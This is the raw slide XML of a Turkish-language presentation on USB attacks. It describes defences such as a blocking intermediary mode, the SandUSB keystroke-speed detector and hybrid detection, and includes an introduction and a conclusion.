              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>modu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vektörlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>engelleyen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>engelleyen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>modu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379D209A-8BF0-4387-9203-90AB04DF1B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542925" y="1465818"/>
            <a:ext cx="10724631" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bu çözümler, önceden tanımlanmış bir gündeme göre belirli kullanıcıların eylemlerini devre dışı bırakmak için kullanılabilir; örneğin, yalnızca belirli kullanıcılar bir komut satırı açabilir veya hiçbir kullanıcı bunu yapamaz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342552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AD41-C86B-4DD9-813F-A6DD60EBD0C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="0"/>
            <a:ext cx="10353761" cy="1326321"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Hibrit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> tespit mekanizmaları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C28100-F865-47FE-9352-871CB7D5CB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568701" y="2601963"/>
            <a:ext cx="5257799" cy="82703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tr-TR" b="1" dirty="0" err="1"/>
              <a:t>SandUSB</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8FF9C13-CF14-4D86-B14A-5D50442787DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568701" y="3429000"/>
            <a:ext cx="5257799" cy="28194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fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>SandUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dinamiği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>analizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yoluyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>temel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> HID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dahil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>savunmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>fiziksel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>katman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>insan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hızlarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazabileceğinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hızına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>odaklanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>SandUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>işletim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılandırmalarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dosyalarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değişiklikler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC59FDE2-A813-4FEA-9484-55863FEA9438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1400175" y="1552575"/>
            <a:ext cx="9039225" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bu çözümler, yukarıda belirtilen tüm savunmaların bir kombinasyonunu kullanır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403949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1C39AD-1676-435B-9813-D885B93F1C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Sonuç</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1AF6B2-F16C-4AF0-814E-C95129E3CE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Birçok son kullanıcı ve kurum çalışanı, güvenliği ihlal edilmiş USB cihazlarının oluşturduğu riskin farkında değildir ve bu tehdide karşı korumasız kalır. Bu nedenle, bu çalışmada siber uzayda yer alan varlıkların siber saldırılardan sosyal mühendisliğin en etkili kullanım yöntemlerinden biri olan USB ile siber saldırı yönteminin hangi boyutta etkili olabileceğini ve bu saldırı yöntemiyle neler yapılabileceğini inceleyip, örnek saldırı senaryolarıyla Attiny85 ile BADUSB yaratma konusunda fikir sahibi olup, bu saldırı yöntemlerine dair geliştirilmiş savunma yöntemlerini inceledik.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103331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17912D4-FB71-4A5D-9C85-FE478035A0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096063"/>
            <a:ext cx="5664805" cy="4220069"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Son yıllarda, bilgi ve bilgisayar sektöründeki radikal gelişmeler, özellikle USB portu üzerinden iş terminallerine bağlantı kurma konusunda muazzam yeteneklere sahip yeni çevre birim cihazlarının üretimine olanak sağlar. Son derece kolay kullanımı ve uyarlanabilir bağlantısı sayesinde, USB bağlantısı artık bilgisayara bağlı donanımlar için vazgeçilmez bir arabirim haline gelmiştir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB, tak ve çalıştır özelliği, yüksek veri işleme, çalışırken değiştirme ve çevre birimlerine güç kaynağı sağlama gibi çeşitli avantajlara sahiptir. USB bağlantısı cep telefonları, hoparlörler, şarj cihazları, klavyeler ve yazıcılar gibi çeşitli çevre aygıtlarının bilgisayarlara bağlanmasını sağlar. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Evrensel Seri Veri Yolu (USB) saldırıları, yaygın olarak benimsenmesi ve oluşturma, dağıtma ve yürütme konusunda neredeyse zahmetsiz olmaları nedeniyle bu endişelerin başında gelir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B192053B-5123-4F08-9378-508411224E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="609600"/>
            <a:ext cx="10353675" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Giriş</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="https://www.guardian360.net/wp-content/uploads/2018/03/USB-attacks.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B3E72A-C2B5-43EC-926E-3ECD32878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400" y="2370667"/>
            <a:ext cx="4697884"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18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F306B-6255-4D2A-831E-CF6923EFFA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="1588064"/>
            <a:ext cx="5429855" cy="4476186"/>
          </a:xfrm>
